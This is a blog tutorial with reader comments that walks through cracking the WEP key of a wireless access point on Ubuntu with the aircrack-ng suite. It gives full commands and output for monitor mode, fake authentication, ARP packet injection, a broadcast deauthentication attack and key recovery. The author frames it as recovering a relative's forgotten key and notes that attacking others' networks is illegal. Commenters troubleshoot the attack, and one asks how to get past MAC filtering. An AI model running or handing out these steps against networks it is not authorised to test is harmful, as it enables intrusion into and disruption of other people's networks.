The information below is not intended to harm other people. Cracking other peoples network is considered illegal in most countries!!
Last day, my sister called me up because she couldn’t connect to her wireless network any more.
She was playing with her network connections and broke everything. She didn’t know the key for her wireless access point and the access point couldn’t be reset because it’s on the attic and we couldn’t reach it.
So I thought I give it a try to hack the access point.
Here are the steps I followed:
First I took a look if my laptop could see the wireless network.
The network I want to crack is wifi9/7
Let’s start cracking the key with the installation of aircrack-ng
sudo apt-get install aircrack-ng
List the adapters
wim@wim-ubuntu:~$ sudo airmon-ng Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0]
I have only one wireless card in my laptop (wlan0) so this is obviously the card I have to use.
Next, I have to put my wireless card in monitoring mode
wim@wim-ubuntu:~$ sudo airmon-ng start wlan0 Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 899 NetworkManager 906 avahi-daemon 977 avahi-daemon 1113 wpa_supplicant 2744 dhclient Process with PID 2744 (dhclient) is running on interface wlan0 Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
mon0 is a new interface which I will use for monitoring. If I run the previous command again, mon0 should be listed as interface.
wim@wim-ubuntu:~$ sudo airmon-ng Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] mon0 Intel 3945ABG iwl3945 - [phy0]
Next, launch airodump on the new interface to hop all the channels and show the wireless networks that can be found:
wim@wim-ubuntu:~$ sudo airodump-ng mon0 CH 2 ][ Elapsed: 24 s ][ 2010-02-08 19:43 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:21:91:F2:06:D9 -1 0 0 0 123 -1 00:1D:7E:43:52:33 -48 61 52 2 1 54e WPA2 CCMP PSK cisco 00:1B:11:6E:78:6D -79 72 0 0 9 54 WEP WEP wifi6-2 00:24:01:65:97:69 -79 54 0 0 6 54 WEP WEP wifi9/7 00:1D:19:23:BC:57 -84 19 14 0 9 54 . WPA2 CCMP PSK GCS 00:23:EE:CB:5A:61 -87 10 1 0 11 54e WPA TKIP PSK telenet-039FF 00:21:91:F3:7D:B6 -88 4 0 0 9 54 WEP WEP WIFI 18 BSSID STATION PWR Rate Lost Packets Probes 00:21:91:F2:06:D9 00:24:2B:8B:4F:81 -83 0 - 1 0 39 baranilew,bbox2-b0c7,default 00:1D:7E:43:52:33 00:1B:77:D9:A9:52 0 54e-54e 0 49 cisco
The network I like to hack (wifi9/7) is listed. I can see that it is secured by WEP. If the security is WPA, it's a lot harder to crack.
Next, run airodump-ng again, but now, let it look at the channel which is used by the network we will crack. In this case 6
wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 mon0 CH 6 ][ Elapsed: 16 s ][ 2010-02-08 19:51 ][ fixed channel mon0: 1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:21:91:F2:06:D9 -1 0 0 0 0 133 -1 00:1D:7E:43:52:33 -34 1 10 1 0 1 54e WPA2 CCMP PSK cisco 00:24:01:65:97:69 -75 96 117 0 0 6 54 WEP WEP wifi9/7 BSSID STATION PWR Rate Lost Packets Probes 00:21:91:F2:06:D9 00:24:2B:8B:4F:81 -85 0 - 5 0 7 default 00:1D:7E:43:52:33 00:1B:77:D9:A9:52 0 1e- 1 0 10 cisco
Just let the previous screen run and open a new consolewindow to run a fake attempt for authentication.
The value after -a is the MAC-address from the network we want to crack, the -e value is the name of the network
wim@wim-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0 No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52) 19:56:24 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6 19:56:24 Sending Authentication Request (Open System) [ACK] 19:56:24 Authentication successful 19:56:24 Sending Association Request [ACK] 19:56:24 Association successful(AID: 1)
The association is successfull. This means the target host doesn’t use MAC filtering. This is good for me, so I don’t have to spoof my MAC address.
Now everything is ready to crack the key.
first, if in your first console the airdump command is still running, close it and start it again with an option to save the output to a file:
wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 -w /home/wim/crackwepwifi -i mon0 CH 6 ][ Elapsed: 0 s ][ 2010-02-08 20:01 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:24:01:65:97:69 -72 100 29 4 0 6 54 WEP WEP wifi9/7 BSSID STATION PWR Rate Lost Packets Probes
To actually crack the key, I need a lot of data. In this case, I've only got 4 packets where I need around 100000 so I have to speed things up a little bit by launching aireplay in injection mode in a new console window:
wim@wim-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0 No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52) 20:07:31 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6 Saving ARP requests in replay_arp-0208-200731.cap You should also start airodump-ng to capture replies. Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Now keep the aireplay-ng and airodump-ng running and run the deauth attack.
wim@wim-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0 20:10:02 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c ). 20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69] 20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69] 20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69] 20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
Let everything run. After a few minutes, you should receive ARP requests and the data will start increasing very feast. I’ve noticed, it goes a little bit faster when I tried to connect in Ubuntu with the target network.
When there are enough packets captured, it’s time to crack them.
I’ve opened a new console and used following command where crackwepwifi-02.ivs is the file we entered previously:
wim@wim-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.ivs
Opening /home/wim/crackwepwifi-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 88000 ivs.
KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )
Decrypted correctly: 100%
Got it! The key for the network is 06469.
I could connect to it without a problem and made my sister happy again
its say [fixed channel mon0] -1..
how can i change to 1?
plss anyone help me?
Does it work if you run following commands?
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
hey, when i enter the sudo- aireplay-ng –fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
with my mac adress and essid.?
all i get is “aireplay –help”
what is wrong?
hey, when i enter the sudo- aireplay-ng –fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
with my mac adress and essid.?
all i get is “aireplay –help”
what is wrong?
I was searching for secured wireless network hacking via Google on Sunday, and I found your page Hacking WEP encryption on Ubuntu | My IT-blog to be extremely useful. Regards gill54@msn.com
Useful tutorial if you want to check your AP security.
Good tutorial, well written. A question though: I get the authentication and association message successful (fake auth) but my mac address is not listed along with the associated clients…this means if there is no clients associated in the AP, no wep crack! What am I doing wrong? I did the whole wep crack with clients already associated using their Mac address and it worked well, the thing is I cant get my Mac address associated with the AP, although it says the association is successful…Thanks a million
I really appreciate your tutorial. I am hacking to learn and not learning to hack. I need your help, please.
When I tried “aireplay-ng deauth” and “aireplay-ng fauth,” It gave me this error: “Waiting for Beacon Frame….” and then “No such BSSID available.” After that, it stopped.
There are many possible root causes of this problem:
- The wireless card is set to a channel which is different from the AP. Solution: Use iwconfig and confirm the card is set to the same channel as the AP.
-The card is scanning channels. Solution: Start airodump-ng with the ”-c” or ”–channel” parameter and set it to the same channel as the AP.
-The ESSID is wrong. Solution: Enter the correct value. If if contains spaces or special characters then enclose it in quotes. For the complete details, see this FAQ entry.
-The BSSID is wrong. Solution: Enter the correct value.
-You are too far away from the AP and are not receiving any beacons. Solution: You can use tcpdump and/or airodump-ng to confirm you are in fact receiving beacons for the AP. If not, move closer.
-You are not receiving beacons for the AP: Solution: Use “tcpdump -n -vvv -e -s0 -i” to confirm you are receiving beacons. Assuming you have dealt with with potential problems above, it could be the drivers or you have not put the card into monitor mode.
For all of the above, running airodump-ng and the related text file should provide all the information you require identify and correct the problem.
To Faisal…
check your card capability on aircrack-ng.com
its say [fixed channel mon0] -1..
how can i change to 1?
plss anyone help me?
when i write this commands:
sudo airmon-ng
it does not display any interferance name , chipset, drivers.
i have installed ubuntu inside the windowsXP.
plz. help me.
It works!
the only problem is that it took me 2 hours to hack my own wireless network.
Thanks for this tutorial!
Also I’ve done everything by the book, exactly BUT the last step
sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.iv
gives me two results.
1) He says the file or directory does not exists
OR
2) He says the BSSID (or ESSID I forgot) is wrong.
I checked and checked and both are correct.
Do I actually have to create a file for instance on the desktop to record the outputdata from airodump?
I did :
sudo airodump-ng –channel 6 -w /home/redhat/desktop -i mon0
(I just placed that in the terminal, is that enough or should I actually create a file on the desktop for instance and then:
sudo airodump-ng –channel 6 -w /home/redhat/desktop/file -i mon0
)
I almost got it to work!!!!! I’m so close!
1) What do you do if the target host uses MAC filtering?